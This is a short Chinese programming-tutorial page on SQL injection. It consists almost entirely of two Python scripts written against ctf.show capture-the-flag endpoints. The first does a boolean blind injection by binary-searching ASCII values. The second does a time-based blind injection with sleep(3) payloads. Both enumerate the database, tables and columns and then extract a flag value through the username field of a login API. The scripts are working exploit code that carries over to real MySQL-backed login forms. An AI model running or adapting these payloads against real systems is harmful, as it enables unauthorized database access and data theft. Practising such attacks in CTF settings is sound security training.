Java教程

SQL注入-2

本文主要是介绍SQL注入-2,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!

简单盲注

import requests
import time

result = ""
url = 'http://986b6ffa-086c-4650-8237-9557e9bd100c.challenge.ctf.show/api/'

for i in range(80):
    min_num = 32
    max_num = 127
    while True:
        mid_num = (min_num + max_num) >> 1
        if mid_num == min_num:
            result += chr(mid_num)
            print(result)
            break
            # table_name = ctfshow_fl0g,ctfshow_user
            # column_name =  id,f1ag
        # payload = "admin' and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_user'),{},1))<{}#".format(i, mid_num)
        payload = "admin' and ascii(substr((select f1ag from ctfshow_fl0g),{},1))<{}#".format(i, mid_num)
        data = {
            'username': payload,
            'password': 0
        }
        response = requests.post(url, data=data)
        time.sleep(0.25)
        if response.text.find('8bef') > 0:
            max_num = mid_num
        else:
            min_num = mid_num


简单时间盲注

import requests
import time

dic = ' ,ctfshow{}abdegijklmnpqruvxyz0123456789-_{}ABCDEFGHIJKLMNOPQRSTUVWXYZ'
url = 'http://414da80d-977f-4f64-baf7-5a7adbebb60a.challenge.ctf.show/api/'
result = ''

for i in range(1, 60):
    for word in dic:
        # payload = "admin' and if(left(database(),{0})='{1}',sleep(3),0)#".format(i, result + word)
        # payload = "admin' and if(left((select group_concat(table_name) from information_schema.tables where table_schema='ctfshow_web'),{0})='{1}',sleep(3),0)#".format(i, result + word)
        # payload = "admin' and if(left((select group_concat(column_name) from information_schema.columns where table_schema='ctfshow_web' and table_name='ctfshow_flxg'),{})='{}',sleep(3),0)#".format(i, result + word)
        payload = "admin' and if(left((select f1ag from ctfshow_flxg),{})='{}',sleep(3),0)#".format(i, result + word)
        data = {
            'username': payload,
            'password': 0
        }
        try:
            response = requests.post(url, data=data, timeout=2.5)
            time.sleep(0.25)
        except:
            result += word
            print(result)
            break

这篇关于SQL注入-2的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!